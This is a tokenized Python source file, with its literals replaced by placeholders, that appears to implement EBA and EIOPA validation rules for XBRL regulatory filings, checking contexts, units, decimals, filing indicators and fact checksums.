CANONICAL_PREFIXES = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } <EOL> def dislosureSystemTypes ( disclosureSystem , * args , ** kwargs ) : <EOL> return ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> def disclosureSystemConfigURL ( disclosureSystem , * args , ** kwargs ) : <EOL> return os . path . join ( os . path . dirname ( __file__ ) , "<STR_LIT>" ) <EOL> def validateSetup ( val , parameters = None , * args , ** kwargs ) : <EOL> val . validateEBA = val . validateDisclosureSystem and getattr ( val . disclosureSystem , "<STR_LIT>" , False ) <EOL> val . validateEIOPA = val . validateDisclosureSystem and getattr ( val . disclosureSystem , "<STR_LIT>" , False ) <EOL> if not ( val . validateEBA or val . validateEIOPA ) : <EOL> return <EOL> val . validateUTR = False <EOL> val . utrValidator = ValidateUtr ( val . modelXbrl , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> val . isEIOPAfullVersion = val . isEIOPA_2_0_1 = False <EOL> modelDocument = val . modelXbrl . modelDocument <EOL> if modelDocument . type == ModelDocument . Type . INSTANCE : <EOL> for doc , docRef in modelDocument . referencesDocument . items ( ) : <EOL> if docRef . referenceType == "<STR_LIT>" : <EOL> if docRef . referringModelObject . localName == "<STR_LIT>" : <EOL> _match = schemaRefDatePattern . match ( doc . uri ) <EOL> if _match : <EOL> val . isEIOPAfullVersion = _match . group ( <NUM_LIT:1> ) > "<STR_LIT>" <EOL> val . isEIOPA_2_0_1 = _match . group ( <NUM_LIT:1> ) >= "<STR_LIT>" <EOL> break <EOL> else : <EOL> val . modelXbrl . error ( "<STR_LIT>" , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = modelDocument , schemaRef = doc . uri ) <EOL> val . qnDimAF = val . qnDimOC = val . qnCAx1 = None <EOL> _nsmap = val . modelXbrl . modelDocument . xmlRootElement . nsmap <EOL> if val . isEIOPA_2_0_1 : <EOL> _hasPiInstanceGenerator = False <EOL> for pi in modelDocument . processingInstructions : <EOL> if pi . target == "<STR_LIT>" : <EOL> _hasPiInstanceGenerator = True <EOL> if not all ( pi . get ( attr ) for attr in ( "<STR_LIT:id>" , "<STR_LIT:version>" , "<STR_LIT>" ) ) : <EOL> val . modelXbrl . warning ( "<STR_LIT>" , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = modelDocument ) <EOL> if not _hasPiInstanceGenerator : <EOL> val . modelXbrl . warning ( "<STR_LIT>" , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = modelDocument ) <EOL> val . qnDimAF = qname ( "<STR_LIT>" , _nsmap ) <EOL> val . qnDimOC = qname ( "<STR_LIT>" , _nsmap ) <EOL> val . qnCAx1 = qname ( "<STR_LIT>" , _nsmap ) <EOL> val . prefixNamespace = { } <EOL> val . namespacePrefix = { } <EOL> val . idObjects = { } <EOL> val . typedDomainQnames = set ( ) <EOL> val . typedDomainElements = set ( ) <EOL> for modelConcept in val . modelXbrl . qnameConcepts . values ( ) : <EOL> if modelConcept . isTypedDimension : <EOL> typedDomainElement = modelConcept . typedDomainElement <EOL> if isinstance ( typedDomainElement , ModelConcept ) : <EOL> val . typedDomainQnames . add ( typedDomainElement . qname ) <EOL> val . typedDomainElements . add ( typedDomainElement ) <EOL> val . filingIndicators = { } <EOL> val . numFilingIndicatorTuples = <NUM_LIT:0> <EOL> val . cntxEntities = set ( ) <EOL> val . cntxDates = defaultdict ( set ) <EOL> val . unusedCntxIDs = set ( ) <EOL> val . unusedUnitIDs = set ( ) <EOL> val . currenciesUsed = { } <EOL> val . reportingCurrency = None <EOL> val . namespacePrefixesUsed = defaultdict ( set ) <EOL> val . prefixesUnused = set ( ) <EOL> for prefix , ns in _nsmap . items ( ) : <EOL> val . prefixesUnused . add ( prefix ) <EOL> val . namespacePrefixesUsed [ ns ] . add ( prefix ) <EOL> val . firstFactObjectIndex = sys . maxsize <EOL> val . firstFact = None <EOL> val . footnotesRelationshipSet = ModelRelationshipSet ( val . modelXbrl , "<STR_LIT>" ) <EOL> def prefixUsed ( val , ns , prefix ) : <EOL> val . namespacePrefixesUsed [ ns ] . add ( prefix ) <EOL> for _prefix in val . namespacePrefixesUsed [ ns ] : <EOL> val . prefixesUnused . discard ( _prefix ) <EOL> def validateStreamingFacts ( val , factsToCheck , * args , ** kwargs ) : <EOL> if not ( val . validateEBA or val . validateEIOPA ) : <EOL> return True <EOL> validateFacts ( val , factsToCheck ) <EOL> def validateFacts ( val , factsToCheck ) : <EOL> modelXbrl = val . modelXbrl <EOL> modelDocument = modelXbrl . modelDocument <EOL> timelessDatePattern = re . compile ( r"<STR_LIT>" ) <EOL> for cntx in modelXbrl . contexts . values ( ) : <EOL> if getattr ( cntx , "<STR_LIT>" , False ) : <EOL> continue <EOL> cntx . _batchChecked = True <EOL> val . cntxEntities . add ( cntx . entityIdentifier ) <EOL> dateElts = XmlUtil . descendants ( cntx , XbrlConst . xbrli , ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> if any ( not timelessDatePattern . match ( e . textValue ) for e in dateElts ) : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = cntx , dates = "<STR_LIT:U+002CU+0020>" . join ( e . text for e in dateElts ) ) <EOL> if cntx . isForeverPeriod : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = cntx ) <EOL> elif cntx . isStartEndPeriod : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = cntx ) <EOL> elif cntx . isInstantPeriod : <EOL> val . cntxDates [ cntx . instantDatetime ] . add ( modelXbrl if getattr ( val . modelXbrl , "<STR_LIT>" , False ) <EOL> else cntx ) <EOL> if cntx . hasSegment : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = cntx , cntx = cntx . id ) <EOL> if cntx . nonDimValues ( "<STR_LIT>" ) : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" if val . isEIOPAfullVersion else "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = cntx , cntx = cntx . id , <EOL> messageCodes = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> val . unusedCntxIDs . add ( cntx . id ) <EOL> if val . isEIOPA_2_0_1 and len ( cntx . id ) > <NUM_LIT> : <EOL> modelXbrl . warning ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = cntx , cntx = cntx . id ) <EOL> for unit in modelXbrl . units . values ( ) : <EOL> if getattr ( unit , "<STR_LIT>" , False ) : <EOL> continue <EOL> unit . _batchChecked = True <EOL> val . unusedUnitIDs . add ( unit . id ) <EOL> factsByQname = defaultdict ( set ) <EOL> for f in factsToCheck : <EOL> factsByQname [ f . qname ] . add ( f ) <EOL> val . unusedCntxIDs . discard ( f . contextID ) <EOL> val . unusedUnitIDs . discard ( f . unitID ) <EOL> if f . objectIndex < val . firstFactObjectIndex : <EOL> val . firstFactObjectIndex = f . objectIndex <EOL> val . firstFact = f <EOL> for fIndicators in factsByQname [ qnFIndicators ] : <EOL> val . numFilingIndicatorTuples += <NUM_LIT:1> <EOL> for fIndicator in fIndicators . modelTupleFacts : <EOL> _value = ( getattr ( fIndicator , "<STR_LIT>" , None ) or fIndicator . value ) <EOL> _filed = fIndicator . get ( "<STR_LIT>" , "<STR_LIT:true>" ) in ( "<STR_LIT:true>" , "<STR_LIT:1>" ) <EOL> if _value in val . filingIndicators : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = ( fIndicator , val . filingIndicators [ _value ] ) , filingIndicator = _value ) <EOL> if _filed and not val . filingIndicators [ _value ] : <EOL> val . filingIndicators [ _value ] = _filed <EOL> else : <EOL> val . filingIndicators [ _value ] = _filed <EOL> val . unusedCntxIDs . discard ( fIndicator . contextID ) <EOL> cntx = fIndicator . context <EOL> if cntx is not None and ( cntx . hasSegment or cntx . hasScenario ) : <EOL> modelXbrl . error ( "<STR_LIT>" if val . isEIOPAfullVersion else "<STR_LIT>" , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = fIndicator , filingIndicator = _value ) <EOL> if fIndicators . objectIndex > val . firstFactObjectIndex : <EOL> modelXbrl . warning ( "<STR_LIT>" , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = ( fIndicators , val . firstFact ) , firstFact = val . firstFact . qname ) <EOL> if val . isEIOPAfullVersion : <EOL> for fIndicator in factsByQname [ qnFilingIndicator ] : <EOL> if fIndicator . getparent ( ) . qname == XbrlConst . qnXbrliXbrl : <EOL> _isPos = fIndicator . get ( "<STR_LIT>" , "<STR_LIT:true>" ) in ( "<STR_LIT:true>" , "<STR_LIT:1>" ) <EOL> _value = ( getattr ( fIndicator , "<STR_LIT>" , None ) or fIndicator . value ) <EOL> modelXbrl . error ( "<STR_LIT>" if _isPos else "<STR_LIT>" , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = fIndicator , filingIndicator = _value , <EOL> messageCodes = ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> otherFacts = { } <EOL> nilFacts = [ ] <EOL> stringFactsWithXmlLang = [ ] <EOL> nonMonetaryNonPureFacts = [ ] <EOL> for qname , facts in factsByQname . items ( ) : <EOL> for f in facts : <EOL> if f . qname == qnFilingIndicator : <EOL> continue <EOL> if modelXbrl . skipDTS : <EOL> c = f . qname . localName [ <NUM_LIT:0> ] <EOL> isNumeric = c in ( '<STR_LIT:m>' , '<STR_LIT:p>' , '<STR_LIT:r>' , '<STR_LIT:i>' ) <EOL> isMonetary = c == '<STR_LIT:m>' <EOL> isInteger = c == '<STR_LIT:i>' <EOL> isPercent = c == '<STR_LIT:p>' <EOL> isString = c == '<STR_LIT:s>' <EOL> isEnum = c == '<STR_LIT:e>' <EOL> else : <EOL> concept = f . concept <EOL> if concept is not None : <EOL> isNumeric = concept . isNumeric <EOL> isMonetary = concept . isMonetary <EOL> isInteger = concept . baseXbrliType in integerItemTypes <EOL> isPercent = concept . typeQname in ( qnPercentItemType , qnPureItemType ) <EOL> isString = concept . baseXbrliType in ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> isEnum = concept . typeQname == qnEnumerationItemType <EOL> else : <EOL> isNumeric = isString = isEnum = False <EOL> k = ( f . getparent ( ) . objectIndex , <EOL> f . qname , <EOL> f . context . contextDimAwareHash if f . context is not None else None , <EOL> f . unit . hash if f . unit is not None else None , <EOL> hash ( f . xmlLang ) ) <EOL> if f . qname == qnFIndicators and val . validateEIOPA : <EOL> pass <EOL> elif k not in otherFacts : <EOL> otherFacts [ k ] = { f } <EOL> else : <EOL> matches = [ o <EOL> for o in otherFacts [ k ] <EOL> if ( f . getparent ( ) . objectIndex == o . getparent ( ) . objectIndex and <EOL> f . qname == o . qname and <EOL> f . context . isEqualTo ( o . context ) if f . context is not None and o . context is not None else True ) and <EOL> ( f . xmlLang == o . xmlLang ) ] <EOL> if matches : <EOL> contexts = [ f . contextID ] + [ o . contextID for o in matches ] <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" if val . isEIOPAfullVersion else "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = [ f ] + matches , fact = f . qname , contexts = '<STR_LIT:U+002CU+0020>' . join ( contexts ) , <EOL> messageCodes = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> else : <EOL> otherFacts [ k ] . add ( f ) <EOL> if isNumeric : <EOL> if f . precision : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = f , fact = f . qname , contextID = f . contextID , precision = f . precision ) <EOL> if f . decimals and not f . isNil : <EOL> if f . decimals == "<STR_LIT>" : <EOL> if not val . isEIOPAfullVersion : <EOL> modelXbrl . error ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = f , fact = f . qname , contextID = f . contextID , decimals = f . decimals ) <EOL> else : <EOL> try : <EOL> xValue = f . xValue <EOL> dec = int ( f . decimals ) <EOL> if isMonetary : <EOL> if val . isEIOPA_2_0_1 : <EOL> _absXvalue = abs ( xValue ) <EOL> if str ( f . qname ) in s_2_18_c_a_met : <EOL> dMin = <NUM_LIT:2> <EOL> elif _absXvalue >= <NUM_LIT> : <EOL> dMin = - <NUM_LIT:4> <EOL> elif <NUM_LIT> > _absXvalue >= <NUM_LIT> : <EOL> dMin = - <NUM_LIT:3> <EOL> elif <NUM_LIT> > _absXvalue >= <NUM_LIT:1000> : <EOL> dMin = - <NUM_LIT:2> <EOL> else : <EOL> dMin = - <NUM_LIT:1> <EOL> if dMin > dec : <EOL> modelXbrl . error ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = f , fact = f . qname , contextID = f . contextID , minimumDecimals = dMin , decimals = f . decimals ) <EOL> elif dec < - <NUM_LIT:3> : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = f , fact = f . qname , contextID = f . contextID , decimals = f . decimals ) <EOL> else : <EOL> if - <NUM_LIT> < xValue < <NUM_LIT> : dMin = <NUM_LIT:2> <EOL> elif - <NUM_LIT:1> < xValue < <NUM_LIT:1> : dMin = <NUM_LIT:1> <EOL> elif - <NUM_LIT:10> < xValue < <NUM_LIT:10> : dMin = <NUM_LIT:0> <EOL> elif - <NUM_LIT:100> < xValue < <NUM_LIT:100> : dMin = - <NUM_LIT:1> <EOL> elif - <NUM_LIT:1000> < xValue < <NUM_LIT:1000> : dMin = - <NUM_LIT:2> <EOL> else : dMin = - <NUM_LIT:3> <EOL> if dMin > dec : <EOL> modelXbrl . warning ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = f , fact = f . qname , contextID = f . contextID , value = xValue , decimals = f . decimals , mindec = dMin ) <EOL> elif isInteger : <EOL> if dec != <NUM_LIT:0> : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = f , fact = f . qname , contextID = f . contextID , decimals = f . decimals ) <EOL> elif isPercent : <EOL> if dec < <NUM_LIT:4> : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = f , fact = f . qname , contextID = f . contextID , decimals = f . decimals ) <EOL> if val . isEIOPA_2_0_1 and xValue > <NUM_LIT:1> : <EOL> modelXbrl . warning ( ( "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = f , fact = f . qname , contextID = f . contextID , value = xValue ) <EOL> else : <EOL> if - <NUM_LIT> < xValue < <NUM_LIT> : dMin = <NUM_LIT:4> <EOL> elif - <NUM_LIT> < xValue < <NUM_LIT> : dMin = <NUM_LIT:3> <EOL> elif - <NUM_LIT> < xValue < <NUM_LIT> : dMin = <NUM_LIT:2> <EOL> elif - <NUM_LIT:1> < xValue < <NUM_LIT:1> : dMin = <NUM_LIT:1> <EOL> else : dMin = <NUM_LIT:0> <EOL> if dMin > dec : <EOL> modelXbrl . warning ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = f , fact = f . qname , contextID = f . contextID , value = xValue , decimals = f . decimals , mindec = dMin ) <EOL> except ( AttributeError , ValueError ) : <EOL> pass <EOL> '''<STR_LIT>''' <EOL> unit = f . unit <EOL> if unit is not None : <EOL> if isMonetary : <EOL> if unit . measures [ <NUM_LIT:0> ] : <EOL> _currencyMeasure = unit . measures [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> if val . isEIOPA_2_0_1 and f . context is not None : <EOL> if f . context . dimMemberQname ( val . qnDimAF ) == val . qnCAx1 and val . qnDimOC in f . context . qnameDims : <EOL> _ocCurrency = f . context . dimMemberQname ( val . qnDimOC ) . localName <EOL> if _currencyMeasure . localName != _ocCurrency : <EOL> modelXbrl . error ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = f , metric = f . qname , ocCurrency = _ocCurrency , unitCurrency = _currencyMeasure . localName ) <EOL> else : <EOL> val . currenciesUsed [ _currencyMeasure ] = unit <EOL> else : <EOL> val . currenciesUsed [ _currencyMeasure ] = unit <EOL> elif not unit . isSingleMeasure or unit . measures [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] != XbrlConst . qnXbrliPure : <EOL> nonMonetaryNonPureFacts . append ( f ) <EOL> if isEnum : <EOL> _eQn = getattr ( f , "<STR_LIT>" , None ) or qnameEltPfxName ( f , f . value ) <EOL> if _eQn : <EOL> prefixUsed ( val , _eQn . namespaceURI , _eQn . prefix ) <EOL> if val . isEIOPA_2_0_1 and f . qname . localName == "<STR_LIT>" : <EOL> val . reportingCurrency = _eQn . localName <EOL> elif isString : <EOL> if f . xmlLang : <EOL> stringFactsWithXmlLang . append ( f ) <EOL> if f . isNil : <EOL> nilFacts . append ( f ) <EOL> if val . footnotesRelationshipSet . fromModelObject ( f ) : <EOL> modelXbrl . warning ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = f , fact = f . qname , contextID = f . contextID ) <EOL> if nilFacts : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = nilFacts , nilFacts = "<STR_LIT:U+002CU+0020>" . join ( str ( f . qname ) for f in nilFacts ) ) <EOL> if stringFactsWithXmlLang : <EOL> modelXbrl . warning ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = stringFactsWithXmlLang , factsWithLang = "<STR_LIT:U+002CU+0020>" . join ( set ( str ( f . qname ) for f in stringFactsWithXmlLang ) ) ) <EOL> if nonMonetaryNonPureFacts : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = nonMonetaryNonPureFacts , langLessFacts = "<STR_LIT:U+002CU+0020>" . join ( set ( str ( f . qname ) for f in nonMonetaryNonPureFacts ) ) ) <EOL> val . utrValidator . validateFacts ( ) <EOL> unitHashes = { } <EOL> for unit in modelXbrl . units . values ( ) : <EOL> h = unit . hash <EOL> if h in unitHashes and unit . isEqualTo ( unitHashes [ h ] ) : <EOL> modelXbrl . warning ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = ( unit , unitHashes [ h ] ) , unit1 = unit . id , unit2 = unitHashes [ h ] . id ) <EOL> if not getattr ( modelXbrl , "<STR_LIT>" , False ) : <EOL> modelXbrl . error ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = ( unit , unitHashes [ h ] ) , unit1 = unit . id , unit2 = unitHashes [ h ] . id ) <EOL> else : <EOL> unitHashes [ h ] = unit <EOL> for _measures in unit . measures : <EOL> for _measure in _measures : <EOL> prefixUsed ( val , _measure . namespaceURI , _measure . prefix ) <EOL> del unitHashes <EOL> cntxHashes = { } <EOL> for cntx in modelXbrl . contexts . values ( ) : <EOL> h = cntx . contextDimAwareHash <EOL> if h in cntxHashes and cntx . isEqualTo ( cntxHashes [ h ] ) : <EOL> if not getattr ( modelXbrl , "<STR_LIT>" , False ) : <EOL> modelXbrl . log ( "<STR_LIT>" if val . isEIOPAfullVersion else "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = ( cntx , cntxHashes [ h ] ) , cntx1 = cntx . id , cntx2 = cntxHashes [ h ] . id ) <EOL> else : <EOL> cntxHashes [ h ] = cntx <EOL> for _dim in cntx . qnameDims . values ( ) : <EOL> _dimQn = _dim . dimensionQname <EOL> prefixUsed ( val , _dimQn . namespaceURI , _dimQn . prefix ) <EOL> if _dim . isExplicit : <EOL> _memQn = _dim . memberQname <EOL> else : <EOL> _memQn = _dim . typedMember . qname <EOL> if _memQn : <EOL> prefixUsed ( val , _memQn . namespaceURI , _memQn . prefix ) <EOL> for elt in modelDocument . xmlRootElement . iter ( ) : <EOL> if isinstance ( elt , ModelObject ) : <EOL> prefixUsed ( val , elt . qname . namespaceURI , elt . qname . prefix ) <EOL> for attrTag in elt . keys ( ) : <EOL> if attrTag . startswith ( "<STR_LIT:{>" ) : <EOL> _prefix , _NS , _localName = XmlUtil . clarkNotationToPrefixNsLocalname ( elt , attrTag , isAttribute = True ) <EOL> if _prefix : <EOL> prefixUsed ( val , _NS , _prefix ) <EOL> elif val . isEIOPA_2_0_1 : <EOL> if elt . tag in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> modelXbrl . error ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = modelDocument ) <EOL> elif isinstance ( elt , etree . _Comment ) : <EOL> modelXbrl . error ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = modelDocument , comment = elt . text ) <EOL> def validateNonStreamingFinish ( val , * args , ** kwargs ) : <EOL> if not getattr ( val . modelXbrl , "<STR_LIT>" , False ) : <EOL> final ( val ) <EOL> def validateStreamingFinish ( val , * args , ** kwargs ) : <EOL> final ( val ) <EOL> def final ( val ) : <EOL> if not ( val . validateEBA or val . validateEIOPA ) : <EOL> return <EOL> modelXbrl = val . modelXbrl <EOL> modelDocument = modelXbrl . modelDocument <EOL> _statusMsg = _ ( "<STR_LIT>" ) . format ( val . disclosureSystem . name ) <EOL> modelXbrl . profileActivity ( ) <EOL> modelXbrl . modelManager . showStatus ( _statusMsg ) <EOL> if modelDocument . type == ModelDocument . Type . INSTANCE and ( val . validateEBA or val . validateEIOPA ) : <EOL> if not modelDocument . uri . endswith ( "<STR_LIT>" ) : <EOL> modelXbrl . warning ( "<STR_LIT>" , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = modelDocument , extension = os . path . splitext ( modelDocument . basename ) [ <NUM_LIT:1> ] ) <EOL> modelXbrl . error ( "<STR_LIT>" , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = modelDocument , extension = os . path . splitext ( modelDocument . basename ) [ <NUM_LIT:1> ] ) <EOL> if val . isEIOPA_2_0_1 : _encodings = ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> else : _encodings = ( "<STR_LIT:utf-8>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> if modelDocument . documentEncoding not in _encodings : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = modelDocument , xmlEncoding = modelDocument . documentEncoding ) <EOL> schemaRefElts = [ ] <EOL> schemaRefFileNames = [ ] <EOL> for doc , docRef in modelDocument . referencesDocument . items ( ) : <EOL> if docRef . referenceType == "<STR_LIT>" : <EOL> if docRef . referringModelObject . localName == "<STR_LIT>" : <EOL> schemaRefElts . append ( docRef . referringModelObject ) <EOL> schemaRefFileNames . append ( doc . basename ) <EOL> if not UrlUtil . isAbsolute ( doc . uri ) : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" if val . isEIOPAfullVersion else "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = docRef . referringModelObject , url = doc . uri , <EOL> messageCodes = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> elif docRef . referringModelObject . localName == "<STR_LIT>" : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = docRef . referringModelObject , fileName = doc . basename ) <EOL> _numSchemaRefs = len ( XmlUtil . children ( modelDocument . xmlRootElement , XbrlConst . link , "<STR_LIT>" ) ) <EOL> if _numSchemaRefs > <NUM_LIT:1> : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = modelDocument , numEntryPoints = _numSchemaRefs , entryPointNames = '<STR_LIT:U+002CU+0020>' . join ( sorted ( schemaRefFileNames ) ) ) <EOL> if len ( schemaRefElts ) != <NUM_LIT:1> : <EOL> modelXbrl . error ( "<STR_LIT>" , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = schemaRefElts , entryPointCount = len ( schemaRefElts ) ) <EOL> if not getattr ( modelXbrl , "<STR_LIT>" , False ) : <EOL> val . qnReportedCurrency = None <EOL> if val . isEIOPA_2_0_1 and qnMetReportingCurrency in modelXbrl . factsByQname : <EOL> for _multiCurrencyFact in modelXbrl . factsByQname [ qnMetReportingCurrency ] : <EOL> val . qnReportedCurrency = _multiCurrencyFact . xValue <EOL> break <EOL> validateFacts ( val , modelXbrl . facts ) <EOL> xbrlFactsCheckVersion = None <EOL> expectedSumOfFactMd5s = None <EOL> for pi in modelDocument . xmlRootElement . getchildren ( ) : <EOL> if isinstance ( pi , etree . _ProcessingInstruction ) and pi . target == "<STR_LIT>" : <EOL> _match = re . search ( "<STR_LIT>" , pi . text ) <EOL> if _match : <EOL> _matchGroups = _match . groups ( ) <EOL> if len ( _matchGroups ) == <NUM_LIT:2> : <EOL> if _matchGroups [ <NUM_LIT:0> ] == "<STR_LIT:version>" : <EOL> xbrlFactsCheckVersion = _matchGroups [ <NUM_LIT:1> ] <EOL> elif _matchGroups [ <NUM_LIT:0> ] == "<STR_LIT>" : <EOL> try : <EOL> expectedSumOfFactMd5s = Md5Sum ( _matchGroups [ <NUM_LIT:1> ] ) <EOL> except ValueError : <EOL> modelXbrl . error ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = modelXbrl , sumOfMd5 = _matchGroups [ <NUM_LIT:1> ] ) <EOL> if xbrlFactsCheckVersion and expectedSumOfFactMd5s : <EOL> sumOfFactMd5s = Md5Sum ( ) <EOL> for f in modelXbrl . factsInInstance : <EOL> sumOfFactMd5s += f . md5sum <EOL> if sumOfFactMd5s != expectedSumOfFactMd5s : <EOL> modelXbrl . warning ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = modelXbrl , expectedMd5 = expectedSumOfFactMd5s , actualMd5Sum = sumOfFactMd5s ) <EOL> else : <EOL> modelXbrl . info ( "<STR_LIT:info>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = modelXbrl ) <EOL> if any ( badError in modelXbrl . errors <EOL> for badError in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) ) : <EOL> pass <EOL> elif not val . filingIndicators : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = modelDocument ) <EOL> elif all ( filed == False for filed in val . filingIndicators . values ( ) ) : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = modelDocument ) <EOL> if val . numFilingIndicatorTuples > <NUM_LIT:1> : <EOL> modelXbrl . warning ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = modelXbrl . factsByQname [ qnFIndicators ] ) <EOL> if len ( val . cntxDates ) > <NUM_LIT:1> : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = set ( _cntx for _cntxs in val . cntxDates . values ( ) for _cntx in _cntxs ) , <EOL> dates = '<STR_LIT:U+002CU+0020>' . join ( XmlUtil . dateunionValue ( _dt , subtractOneDay = True ) <EOL> for _dt in val . cntxDates . keys ( ) ) ) <EOL> if val . unusedCntxIDs : <EOL> if val . isEIOPA_2_0_1 : <EOL> modelXbrl . error ( "<STR_LIT>" , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = [ modelXbrl . contexts [ unusedCntxID ] for unusedCntxID in val . unusedCntxIDs if unusedCntxID in modelXbrl . contexts ] , <EOL> unusedContextIDs = "<STR_LIT:U+002CU+0020>" . join ( sorted ( val . unusedCntxIDs ) ) ) <EOL> else : <EOL> modelXbrl . warning ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = [ modelXbrl . contexts [ unusedCntxID ] for unusedCntxID in val . unusedCntxIDs if unusedCntxID in modelXbrl . contexts ] , <EOL> unusedContextIDs = "<STR_LIT:U+002CU+0020>" . join ( sorted ( val . unusedCntxIDs ) ) ) <EOL> if len ( val . cntxEntities ) > <NUM_LIT:1> : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = modelDocument , count = len ( val . cntxEntities ) , <EOL> entities = "<STR_LIT:U+002CU+0020>" . join ( sorted ( str ( cntxEntity ) for cntxEntity in val . cntxEntities ) ) ) <EOL> for _scheme , _LEI in val . cntxEntities : <EOL> if ( _scheme in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" 